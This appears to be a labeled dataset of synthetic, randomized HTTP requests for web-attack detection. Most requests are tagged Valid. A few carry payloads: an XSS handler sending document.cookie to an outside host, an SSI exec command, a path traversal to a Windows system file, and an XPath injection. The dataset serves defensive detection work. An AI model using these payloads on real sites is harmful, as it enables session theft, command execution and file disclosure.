User-Agent: Mozilla/8.3 (compatible; orvrnoe; Solaris; hac4; el6s)
UA-CPU: x86
UA-Disp: 654,6999,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: HTTP/3.5 www.ioonetA.gif:97447
Transfer-Encoding: identity
Upgrade: rasu/0.8, teies/0.4, nSn4/5.5, rceyaa/2.6
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 229.226.152.130
X-Serial-Number: 51540025219516295727
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37803
Start - Id: 5317
class: Valid
POST /uofEyizRemcertae/aQB8pM_Fc/rO@G/S5uv6/dhal6e/aHWKSseIHS1DPPc@nX_/8wLzd0KT6zMe@Udie/Iin/o@X@Xz9E5YI/39np39j.swf? HTTP/1.0
Content-Length: 143
Content-Language: dtrlo,ei9oa
Content-Encoding: compress
Content-Location: http://tm42tmep.it/itqmpaes/tewira.js
Content-MD5: YXVudHQ3dWVlb3NlNWFhdA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 08 Jan 07 24:03:56 GMT
Last-Modified: Thu, 22 Dec 05 14:44:03 GMT
Host: 142.127.71.18
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.1, compress, identity;q=0.6, deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 250.143.222.249
Cookie: yeneudinh57=er2CrR5m+ra;otobatx9z=285325;ttOg3ryihewwuiu=6rhzs8ckwgetn
Cookie2: $Version="95"
Date: Sun, 12 Dec 04 06:32:44 CET
ETag: "152va90sIrK.1Oj_ALtg"
Expect: enfl
From: hsviii@dds6i8NT.ch
If-Modified-Since: Tue, 13 May 08 16:09:27 UTC
If-Unmodified-Since: Fri, 23 Jan 09 04:08:39 CET
If-Match: "GeN00xtUP9l52vbaNp8"
If-None-Match: "gyWmoE.sWPaD7OB"
If-Range: *
Max-Forwards: 8
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Aaaf lnogj4h=etlars
Authorization: Digest username="sKad"
Range: 8822-34,539805-
Referer: http://ynteh.be/fi9ls/s73le5t/Dbryr/bmou/aehzdcp.dll
TE: trailers
Trailer: If-None-Match
User-Agent: aVzM-qwW http://www.loif.it
UA-CPU: MIPS
UA-Disp: 370,737,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 4339x4945
Via: 7.8 217.9.119.114:842, 3.7 29.7.254.205
Transfer-Encoding: gzip
Upgrade: Oce/9.1, a2s/1.1, m5nav/1.5
Warning: 919 www.c7goh.css "ddl7cv0e8s3eeofeu" 
X-Forwarded-For: 194.87.49.44
X-Serial-Number: 6090087986849
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~

Qt0S7catW8M=T%eyRehj&edN2tcii=jGq7oJElQt0G&rr=efn&9nads8egphdy=dh6yisrtpabiksrgJ&Rexec5.NTNShG=(&e9eri4ttE=lcfkE&idgeeidlhdDaYx=lxp2uzcBiz7

End - Id: 5317
Start - Id: 14647
class: Valid
GET /cy374gnarlnudytze/Joj5/sr.jpg? HTTP/1.1
Host: www.s4aa6uoyx.st:61
Connection: lXmhrf
Accept: image/*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: min-fresh=20664
Client-ip: 101.10.193.22
Cookie: to2s7xo=ow3_AJuirh;ute=9549501873;sttGvmTealn=odDQ7Q;sq=oac
Cookie2: $Version="4"
Date: Wed, 26 Jul 06 15:49:01 CET
ETag: "6mSMty0yBLjXo7I_3cJ"
Expect: dejnL
From: uneUynt@llT9mrd0ie.uk
If-Modified-Since: Thu, 20 Jan 05 19:31:01 UTC
If-Unmodified-Since: Thu, 06 May 04 13:23:12 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 28 Aug 07 16:44:21 UTC
Max-Forwards: 647
MIME-Version: 1.8
Pragma: su8eo='didotMd'
Proxy-Authorization: sCpta iMitRl=ojmbz
Authorization: NTLM Y0FsZWlzdWR4ZXRyZW5Xbm9pV25kcjZuZWNPdGhtZW5pbA==
Range: 69-7904,-775
Referer: http://www.o19yus.net/enaxitci/emdtt/wgEr/dees7mh.php4
TE: chunked;q=0.9
Trailer: Transfer-Encoding
User-Agent: tsoeauy
UA-CPU: StrongARM
UA-Disp: 1652,237,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 557x7129
Via: 2.0 107.68.238.205
Transfer-Encoding: gzip
Upgrade: sep9n/1.9, toxe/6.1, lpmu/3.8, a8iA/5.8, gtttil/4.9
Warning: 093 www.ed1gi3a.shtml:52 "snve" 
X-Forwarded-For: 243.163.162.130
X-Serial-Number: 29846910
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14647
Start - Id: 19528
class: Valid
GET /mg9@replaceJjxP66u/escnoaoi9XLaKTtsNt/pieA38/0dmfromh.Ik/OttRAe/zueLrktLi1/eealyhTytinm7ei.cgi?OELDZFZ=aolusoosd8you&dgalylEeetl=c%24&calesl0h0l=3eae&te=465921&Ykb-86e=tet4w2asuuhnqd&phpmBssOXZm.=hynode+&oR3q8qy=91&wetebma8h=flieGmjmrtrateefo&ltewnimothCr=imdoirj%40o%25n%3Bu%3Ce&D5nshnaiIer1n=tVZsTGDMkYD&awetsdhsiwyesie=7&duo5yTagxet8cn=wtu0eormqhzuf&yd=4474311&tnurtsitaon=7868&sa=7816604492 HTTP/1.1
Host: 226.120.13.151
Connection: close
Accept: application/rtf;q=0.7
Accept-Charset: euc-tw;q=0.0, x-mac-turkish, utf-8, iso-10646-ucs-2
Accept-Encoding: compress;q=0.8
Accept-Language: c-glseabrd, g-rtgsqv;q=0.1, u-htmn2ide;q=0.1, 3hEoo-eos;q=0.7, W3dhe-3no
Cache-Control: only-if-cached
Client-ip: 150.105.58.192
Cookie: lyhcnsezel3f=r%i;rCfee=3108202
Cookie2: $Version="299"
Date: Sat, 06 Aug 05 21:59:36 GMT
ETag: W/"G@R50dmYrtyF5OPvYbL"
Expect: itetett
From: uvksevoi@am3seosru.ch
If-Modified-Since: Fri, 01 Oct 04 13:25:36 UTC
If-Unmodified-Since: Tue, 16 Mar 10 23:31:02 UTC
If-Match: "4CmEwZ3qDkbOQ1JTG"
If-None-Match: *
If-Range: Mon, 12 Feb 07 08:57:54 GMT
Max-Forwards: 8
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Basic bnAzaTBkOm9yU1V2c1N0
Authorization: Basic b2lndHN0MjQ6c2h1dHZp
Range: -470982,-47168,1897-
Referer: http://www.4nanyrH.st/ehsee/TrswkddN/dTIeliat.jpeg
TE: trailers,trailers
Trailer: Date
User-Agent: egwOqXWwf http://www.i1kfa0m6.uk
UA-CPU: PowerPC
UA-Disp: 332,0643,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 690x0416
Via: FTP/9.6 58.211.72.22:36815, 8.1 www.uaya.js, HTTP/0.4 www.ld9rb.js
Transfer-Encoding: 7Itv; ncts=dtt6Tzj
Upgrade: ath/3.5, ct8ck/1.4, ijeoul/7.8, ean9p/4.9
Warning: 802 110.29.94.224 "lAaytl0aamiAkestm" 
X-Forwarded-For: 77.22.60.7
X-Serial-Number: 910419107013273
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19528
Start - Id: 48107
class: XSS
GET /4perlcR1lKgwdive7/hVEqeBFc03zesfoiM77x/u36RBrz7KPWgGwfV/nGeSUoUC/be2oea.htm?msnsieNisnzale=643255&axzi0t4sfaecto=51163&4rpgazopo7thSn=666193&nny=417229&dlikenR6.Fwj5object=oioposition%2B%26AE%3Cc1&6yspspSeb=%3Cdiv+++++onmouseover++++%3D%22++++%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.ti.com%2Fcgi-bin%2Ftoaselre.cgi%27%2Bdocument.cookie%29%3B%5D%22%3E&GQygvjF=r7wGssw&el2buomo=nA3&ROECEFUgMdzK=ftphmeeLroeeuS+u%296+n&pi=804&eioeSY=ere%5Cyebi30aiobwp-rnsslinke&m-vTQCO2GJ=90716&0ymoaEg=330&aaoeisade=4479173&NanbetCrsiw6=t6CeikiS8zY9 HTTP/1.1
Host: www.Ehlwyeza6n.it
Connection: close
Accept: text/*, video/*, video/mpeg
Accept-Charset: euc-tw, shift_jis;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=07056
Client-ip: 182.252.28.208
Cookie: UfEy=lr'6cqzumirsUAa
Cookie2: $Version="6"
Date: Thu, 21 Jun 07 21:59:03 CET
ETag: "KyczCRgyUC3BqNACZw"
Expect: 100-continue
From: bnwioIhh@fnmcaAYfe6.de
If-Modified-Since: Sat, 15 Oct 05 11:23:08 GMT
If-Unmodified-Since: Wed, 06 May 09 05:49:14 GMT
If-Match: "tJX6Lsh4xpqwcWn"
If-None-Match: *
If-Range: *
Max-Forwards: 35
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: ny9cr sjeOhe=rf9a
Range: -913822,250-
Referer: http://1dcB.gov/clsL/asrb9.bin
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/2.5 (X11; U; Open BSD i386 4.7; du-sq; rv:3.6.0) Gecko/29785790
UA-CPU: StrongARM
UA-Disp: 367,260,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6001x2247
Via: 1.7 www.ruyxtw.css:88
Transfer-Encoding: deflate
Upgrade: k6wua/1.5, metwv/8.5, seYsb/7.3, xm2ufg/8.4
Warning: 668 168.38.49.39 "rrsFr0irpvtbsQzh0o" 
X-Forwarded-For: 69.186.228.89
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48107
Start - Id: 39995
class: SSI
GET /N4UsgtElta9/up5LOU/theottmltnDhwee/lJz_fVMa/hcoeDs3ocd2onesoungL/wsimsdini3/ezy/vReesebasci/isidei.htm?finkcge=057952&0FVb=8339635&CPY8YvK6=714319&5yCmrkABbinZL8=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fls++++-l+%2Fhome%2Fa4ha%2FetdrhNhs%22+--%3E&tlohdynf4e=iQM0Yw0 HTTP/1.0
Host: 11.161.71.162:86111
Connection: nDnt
Accept: application/*, image/png
Accept-Charset: hz-gb-2312
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=644
Client-ip: 253.235.28.77
Cookie: docsurmmgo6a=seWA1MpM2A;aqceitnnta=waey
Cookie2: $Version="26"
Date: Tue, 06 Jan 04 22:21:31 GMT
ETag: W/"snzYcROZfCdT0_HXP"
Expect: 100-continue
From: atetgwlh@rphs.com
If-Modified-Since: Tue, 16 Nov 04 09:40:46 UTC
If-Unmodified-Since: Thu, 08 Apr 10 22:18:27 UTC
If-Match: "5ATC9_blYrj3waAP5o0"
If-None-Match: *
If-Range: *
Max-Forwards: 6798
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: NTLM eGVoYU44dHJtYXJUODcyZWV6b25idTRpN3RpMmMzcmlEYnY0MW5qcmFjQQ==
Authorization: Digest response="5dc4135A5DF33d19fFc37CdbA06B50E0"
Range: 618-573,4-,461-
Referer: http://www.ttcOs.de/c4tefn/ucE5Gi/gEL7a/ygoop.txt
TE: trailers
Trailer: TE
User-Agent: Mozilla/3.0 (Windows; U; Win98 3.9; ee-4a; rv:1.7.3) Gecko/89578038
UA-CPU: Sparc
UA-Disp: 8616,110,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 860x1351
Via: HTTP/4.3 www.tsBitour.gif:1
Transfer-Encoding: identity
Upgrade: tati1/9.0, By2egw/7.7, naml/5.4, tau/2.1, 0aZt7/2.6
Warning: 144 202.212.126.14 "EZtzaaiitexz9rs" 
X-Serial-Number: 18116
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39995
Start - Id: 25522
class: Valid
GET /mEtosi7aa/sIk84ETj/eMCMqBKX1uW/s6/w3y/Rte/ttZL8@-zYO4M.pl?6Ponta=a0te7hnjf&meh=e2An1mrd&@0S.obkl=9982037&njfaegaom91ye=eho0&efaeiRsrEn2a=25883236&eh=et8d%2Betct%40tibema&dnthagup1ahwos=ilos&oghnps9icno7=8tr%29&Rf0nesune=0498477&oahnehas=aLoesMtl%27tqec&ehaimnssi=Ftzn&oogtsfym=nsn%3B+g%2BtRo%7Ca&saE4sh4ywy=0 HTTP/1.0
Host: 37.95.86.218:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: max-age=0
Client-ip: 48.113.165.204
Cookie: ahoYeg6Esersh2=12456;3%uoqaw8=eimgd
Cookie2: $Version="39"
Date: Sat, 24 Dec 05 14:59:01 CET
ETag: W/"2HygnodO_Jen40r.tb"
Expect: 100-continue
From: osil@wYub.gov
If-Modified-Since: Sat, 18 Oct 08 20:07:00 CET
If-Unmodified-Since: Fri, 20 Mar 09 06:47:08 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 973
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic bm9yZzFyOm93c28=
Authorization: NTLM aWF5c2VuZWkxdXVxODc4bWx3bGFsRWFzcmVvODNvNWNjaXI4d3RlaXNmNzFuZw==
Range: 667-742
Referer: http://lma7ee.be/dAeele/soflae.jsp
TE: gzip
Trailer: Date
User-Agent: n5rtI2 http://www.sINg.st
UA-CPU: MIPS
UA-Disp: 0020,943,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5796x493
Via: FTP/0.2 178.121.204.50
Transfer-Encoding: compress
Upgrade: utH/5.0, httwz/8.8, luydy/3.7, rLo/1.4, iool1/1.7
Warning: 857 81.72.64.201:0289 "eelt7eziiiiloger" 
X-Forwarded-For: 62.171.11.144
X-Serial-Number: 9918504
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25522
Start - Id: 36095
class: PathTransversal
GET /hz6fAkjZiTBqrBt/edtmo/eSZ.srtFm.gif?rr0fsn=++sA&wszevrheedd=0&Oh=ac6eiOt2er&0qanktia=arqPpooQf&wpos2erNe=%5CWINDOWS%5Csystem.ini&1eidr3ridsNOt=250&lui9sq4egqslee=exec&SWfDhxp_Qmocha=387720&3rdtoet89dlee=eqil HTTP/1.1
Host: 66.198.60.20:8
Connection: goiaidfe
Accept: video/*, video/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: t9e-yhatl, acilHca-rhal
Cache-Control: xh=laa8
Client-ip: 200.55.112.27
Cookie: bo3snsowtyEqcer=peiinddfhh;ieGgostlo6s=58707254;9yI4oMj07divY@=mcsfx0le7tei9se;etrlO1e=3lrantyjuchiwpiawe;jlNqthavingXgsxe1=zrscriptetf <lrlbc;2n2=83033
Cookie2: $Version="6"
Date: Mon, 01 Nov 04 20:46:32 UTC
ETag: W/"Y2c3Smyqo1dEDpGFg_"
Expect: 6dnisV=mDiz2b;TEra=sdtlg7e
From: 2srfon@a2wsst04Ft.cz
If-Modified-Since: Mon, 25 Oct 04 20:58:02 UTC
If-Unmodified-Since: Thu, 15 Apr 10 05:41:04 UTC
If-Match: "MDwp30OG_wU6epQb"
If-None-Match: *
If-Range: "lrbVR.TGMoTJnsZic_n"
Max-Forwards: 8933
MIME-Version: 3.5
Pragma: DjRsrf=5giir
Proxy-Authorization: Digest username="ftps"
Authorization: rtt8d pqeoe=bouttla
Range: 78-
Referer: /tcer4d.php4
TE: gzip,trailers,chunked
Trailer: Pragma
User-Agent: nn2Salr (r3soxyPI; iOdm05O; jOf24r; r58WTaG)
UA-CPU: Sparc
UA-Disp: 6269,3972,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 6563x796
Via: FTP/5.1 81.57.220.255, 5.0 www.ebni.png, 1.0 100.87.162.215
Transfer-Encoding: compress
Upgrade: Fd1sk/0.3
Warning: 647 231.206.148.64:01 "5tdtn" 
X-Forwarded-For: 76.95.176.105
X-Serial-Number: 5507795373725385751
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36095
Start - Id: 9691
class: Valid
GET /tjtiwiEtcct1/uwqivw/nCBFIRQJ6EuY2TH/s@osGSwx/wMdTMkQsR5_ZHbLu/ludhoncmeeNeot/eeci1/ni2r/rvbftwenouoeqcmorrn/s7zaptN5ljYF5m/i0taa/rjRvero.html?HftTa6_JFw@=t6u1&4wl=ue&io4ovnut=40&rxiteOTE=seriishe6RtNufo HTTP/1.1
Host: www.iHrrfea.net
Connection: keep-alive
Accept: application/rtf
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 91.244.100.7
Cookie: Ynccrciwdc=30289;eto=a.7
Cookie2: $Version="8"
Date: Sat, 29 Aug 09 21:17:10 GMT
ETag: W/"7-bwmdAwrAU_eiuFRQ0"
Expect: a6ne2bi=lomue
From: panraij@rNesn.ch
If-Modified-Since: Thu, 10 Apr 08 14:30:23 GMT
If-Unmodified-Since: Fri, 20 Oct 06 18:07:19 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3720
MIME-Version: 6.8
Pragma: eqozD='lpvgIRe'
Proxy-Authorization: Basic ZXRyYWhybzQ6cGc0MGVmZQ==
Authorization: NTLM anRpbXBvbk0ydHJlaHpwbmRyZGVudWFlSExlck1paW0=
Range: -75689,8442-
Referer: /e2esgUpN/Fscti.pl
TE: trailers,chunked
Trailer: Accept
User-Agent: hs3nrtncst0gsQ
UA-CPU: x86
UA-Disp: 229,8929,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 669x055
Via: 1.4 244.86.22.99, 2.4 www.P0Tpa.gif, FTP/1.0 www.eEefy.shtml
Transfer-Encoding: gzip
Upgrade: td7l/3.2, eIl/8.1, toa/8.7
Warning: 376 www.wu1w.htm:846 "serteri" "Tue, 11 Dec 07 19:12:50 GMT"
X-Forwarded-For: 186.223.84.207
X-Serial-Number: 66630290652
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9691
Start - Id: 48811
class: XPathInjection
GET /sGok_R38wHZsEg/uCY/q7wbJKZM9_4CQqu1M.html?Rh=NeIcRisa%27+++or+++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++or+++++%27c1voca%27%3D%27 HTTP/1.0
Host: 11.243.13.77:5
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: koi8;q=0.3, cp-936
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-store
Client-ip: 5.230.196.145
Cookie: jRrAjU=t4ewdderrrar;o4=dati3uxcrsoa
Cookie2: $Version="7"
Date: Thu, 06 Apr 06 21:48:50 GMT
ETag: W/"6WLOop_Whk@w0uCW8DO"
Expect: 100-continue
From: 18kll@eaes.it
If-Modified-Since: Sat, 29 Aug 09 23:20:12 UTC
If-Unmodified-Since: Sat, 18 Sep 04 19:39:02 UTC
If-Match: "nvJe5tJjZu8kf7VKDA5W"
If-None-Match: "o@a@6..Kgx04Ue3"
If-Range: *
Max-Forwards: 8
MIME-Version: 7.6
Pragma: ofw=eRvn
Proxy-Authorization: Digest response="08bA7c67a569BFcBED9f6CeCC1e6B5Cb"
Authorization: Basic bVAzNmxPOmxsaWVz
Range: 5889-260241,53147-,8-96
Referer: /dzr3eco/iytd/trot9nt/oiro.swf
TE: trailers,chunked;q=0.1
Trailer: If-Match
User-Agent: nsdts8ew
UA-CPU: MIPS
UA-Disp: 065,1900,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 610x7320
Via: FTP/9.5 84.230.141.51
Transfer-Encoding: compress
Upgrade: aimtj/3.9, eeTl/5.5, Otocrt/9.5
Warning: 095 48.11.160.104 "zathsTosotrtckdn" 
X-Forwarded-For: 30.210.172.155
X-Serial-Number: 9894674694471428
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48811
Start - Id: 26985
class: Valid
GET /iM9yNTtaC7I2eY7xU/hee/4Lcri5Pyh/d8sEQuBO9KwY/c8tit_sNubgsoundN/r3Oosomeaf/uT0baX.asp?ts=81309&olpdme81aOoS=8&YK77cUv9=raAebahaypoTsL&munine=ksu&kama3r8R=5FQs%40R9A&nr5h5teOafos=ejBv&rcaeher=n%3B%24positionuvarpbetween%25u%3A%25aEoH+a&vwndj2sl=ct%5Dl6&9nlher2em0g=+c&eziuaalioesiet=ni&zsty8nhe5=%7Cdo HTTP/1.0
Host: www.nenhaed.uk
Connection: close
Accept: video/*;q=0.7, application/rtf
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: min-fresh=59
Client-ip: 232.114.144.52
Cookie: eos=Aystdini;dOe5w5gaao=96
Cookie2: $Version="48"
Date: Wed, 06 Aug 08 08:01:08 UTC
ETag: W/"ZRNduEirGmna_BUVr"
Expect: detriet
From: eanp0se@1atltaa.biz
If-Modified-Since: Fri, 14 Dec 07 23:12:23 CET
If-Unmodified-Since: Wed, 21 May 08 14:20:28 UTC
If-Match: "M0QsBbLnB6zW2p1@Y"
If-None-Match: *
If-Range: Thu, 23 Apr 09 21:25:11 CET
Max-Forwards: 4
MIME-Version: 5.9
Pragma: nree='alBoteo'
Proxy-Authorization: Digest uri=/biqENYth/edeooS/chbcKuvl/4rinantn.jsp
Authorization: Digest uri=http://1ooitc.it/pgat9al/rGh6zr.doc
Range: 09357-
Referer: /snisii.gif
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/6.6 (X11; U; SunOS sun4u 1.9; tl-1g; rv:6.4.1) Gecko/99660207
UA-CPU: Sparc
UA-Disp: 181,245,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 6860x985
Via: 3.0 www.ctersmho.html, 1.5 www.lerdvroi.jpeg:798
Transfer-Encoding: compress
Upgrade: n2et/1.1
Warning: 349 www.ieeei.png "m7sE6oeiEscsnataOs" 
X-Forwarded-For: 126.84.101.124
X-Serial-Number: 781010344531
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26985
Start - Id: 22149
class: Valid
GET /bvBhGgQgtRaU/ag/snfm@g/AkaoI.shtml?ftox0e=981524&st9hAeAnis=e2pmui6noblo3atun&dal=qks8i&j4tybbsldiaie=7674289189 HTTP/1.1
Host: www.butsodpad.gov
Connection: close
Accept: text/*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: eE-Uq8f, m-s, eanw-au4iSr;q=0.7
Cache-Control: no-cache
Client-ip: 53.49.110.36
Cookie: 3aflsi0ft2hd=tAsbmnldoleilq4ee;IhfZPDfP=heursc;NO7efoNa=rcwechob;formcoptUBV=mYiionzea7es2t;6chsN=445454
Cookie2: $Version="7"
Date: Thu, 05 Feb 09 09:30:19 CET
ETag: W/"x0nw.1q1-Yd0rJb7-HAp"
Expect: 0eOsst=prnHif81;eunueed
From: Terasul@fctxeEw.be
If-Modified-Since: Sat, 22 Jan 05 11:08:10 GMT
If-Unmodified-Since: Tue, 10 May 05 13:45:47 GMT
If-Match: "7pJMTPzgIBVvi5ku"
If-None-Match: *
If-Range: *
Max-Forwards: 99
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.cneeo.de/urssresh.exe
Authorization: Digest qop=auth
Range: 807309-,197-,-275
Referer: /uraaI.txt
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: beiio/1.5.3
UA-CPU: x86
UA-Disp: 0825,2086,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 829x0531
Via: HTTP/6.8 89.116.113.122, FTP/1.3 www.japt.tiff
Transfer-Encoding: deflate
Upgrade: 1icdej/9.5, un4b/5.8, cnai/1.3, seto/7.7, rlnriy/9.7
Warning: 917 www.soeSgapr.css "c5leeikhcoalpeot4" 
X-Forwarded-For: 164.137.229.85
X-Serial-Number: 89307518698
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22149
Start - Id: 6919
class: Valid
PUT /aoiC-tkxj/rlUtJJV@./swF-ezJd-/vOWGQLX/e_h/tMDPPR@ll@/l7IlEvbGw2nWJ2y0JVGm/iuaeeIx3ho/iw5MHG7/h6jH5.kdVpjBMZ_7Wso/pmN1_dshdA.asmx? HTTP/1.0
Content-Length: 84
Content-Language: lv1n,nxoVrnre,ea5t
Content-Encoding: identity
Content-Location: /tluetnhp/sgou/npnsa/sesaoIeq.wmn
Content-MD5: dGRoYU96aXJsZWFlQW5lcw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Oct 08 04:50:21 UTC
Last-Modified: Wed, 15 Nov 06 03:38:48 GMT
Host: 163.213.246.43:69362
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: windows-874;q=0.7, x-mac-chinesetrad, windows-874, windows-874;q=0.3, koi8
Accept-Encoding: identity;q=0.4, gzip
Accept-Language: dlaOtid-ae, d-hkda3uri, u-aefdMR;q=0.2, 0EeI0m-l;q=0.2
Cache-Control: min-fresh=6
Client-ip: 197.159.151.185
Cookie: 9nlznvpoar=202
Cookie2: $Version="95"
Date: Wed, 08 Sep 04 21:20:19 GMT
ETag: W/"Cg@8hVnyqEe-eWymWW"
Expect: hIio
From: yo9el@iae0gwfot.st
If-Modified-Since: Wed, 16 Dec 09 03:25:08 UTC
If-Unmodified-Since: Fri, 17 Jun 05 22:10:24 CET
If-Match: *
If-None-Match: *
If-Range: "Fo4.Al0X6EUhdlt"
Max-Forwards: 0
MIME-Version: 1.0
Pragma: bl=afHhe
Proxy-Authorization: Digest opaque="4mhrdtn"
Authorization: Digest uri=/urwy.rar
Range: 50-,2-,-36866
Referer: /forbge/oihh6.tiff
TE: trailers,deflate,gzip
Trailer: Accept
User-Agent: Mozilla/7.4 (Machintosh; U; PPC 3.4; 4c-td; rv:3.6.5) Gecko/20260709
UA-CPU: PowerPC
UA-Disp: 859,5349,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 020x921
Via: 1.6 121.68.26.199
Transfer-Encoding: deflate
Upgrade: 4wi/2.8
Warning: 638 www.shTkt.js "btitcWe0Sneyss7waf" "Sat, 20 Jan 07 15:52:13 UTC"
X-Forwarded-For: 51.157.61.248
X-Serial-Number: 78875126
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

si5hzhy9bsemMh=688617551&taeYa=g3Rnr&7saK4erv=72535&esTolsIaKa=ss )&vqPigt=1647038

End - Id: 6919
Start - Id: 19212
class: Valid
GET /nxsi/fw1/0union2N/l-iWUIKo/ii9lOliaieNhiontq/mexec4t3P-L6ETXl/.@MWBAlocopyWgosJall/@oS/ao/gp/rtPSfMWBC8T.pl?t9tesa7oaeNNt=yAodZXNKU3it&eneIs7d5s=gd0sZrx&lhHInetiokLwjd=so&tmpnfR-pB=3864683 HTTP/1.0
Host: www.utSdu.st
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: min-fresh=6
Client-ip: 208.203.160.234
Cookie: RieTgmdnure=htaccesnetcat<ychild;4aOwqnmr=p59fnStmQIT;2eeshatwr7p=tem4wT8;hw0daE=142
Cookie2: $Version="3"
Date: Thu, 24 Feb 05 03:02:16 UTC
ETag: W/"e01vwLN.7P.8EOwpqtmw"
Expect: 100-continue
From: qhr7o7@aeAfo9.biz
If-Modified-Since: Wed, 26 Nov 08 10:06:51 CET
If-Unmodified-Since: Mon, 18 Feb 08 19:09:25 CET
If-Match: "Gu7S4J6eAwjEh9@"
If-None-Match: *
If-Range: Thu, 26 Nov 09 15:46:22 CET
Max-Forwards: 0
MIME-Version: 6.9
Pragma: Eeu=i
Proxy-Authorization: Digest uri=/8tsi1ee/nreUitch/ynlernls/rylqcbHp/vyr6.shtml
Authorization: Basic dGp1b3I6dmVhbg==
Range: -425,301844-18848,-5809
Referer: /n4dst/iuli6t/daeriy9f.mpg
TE: trailers,deflate;q=0.1
Trailer: Accept-Encoding
User-Agent: Mozilla/6.8 (X11; U; SunOS sun4u 0.3; ed-ta; rv:2.3.2) Gecko/22700454
UA-CPU: 68000
UA-Disp: 399,520,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 203x411
Via: HTTP/8.3 86.20.65.43, 4.2 www.ayf7ais.tiff, 5.8 63.87.20.255:5
Transfer-Encoding: deflate
Upgrade: deldgt/6.6
Warning: 712 119.160.165.41 "pneeepsiiweeth" "Wed, 09 Apr 08 02:46:58 CET"
X-Forwarded-For: 241.243.123.217
X-Serial-Number: 1861049652
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19212
Start - Id: 16531
class: Valid
GET /n0PLZL4/gr16v-C3ihsfZa.bin?Utc6inelttbeEdD=55892237&elnsyxhd=%28s&vgXOAnph-=269211271&ein98tb5tt=s HTTP/1.0
Host: 59.182.89.17
Connection: close
Accept: text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 1fcsm-lhad3b5;q=0.7, rdaa-ea;q=0.2, meE-uw, seAR-eu0;q=0.9
Cache-Control: no-transform
Client-ip: 243.52.208.161
Cookie: hex7tthnRehona=16263;Eepoebur=wrynai6lhh;0nemg=6278;giifwRsen2=biifO7m;@@FLJ@cG4sexec=t8Lha_;atj5elp1i=iDnTFc
Cookie2: $Version="6"
Date: Sat, 19 Sep 09 01:25:20 CET
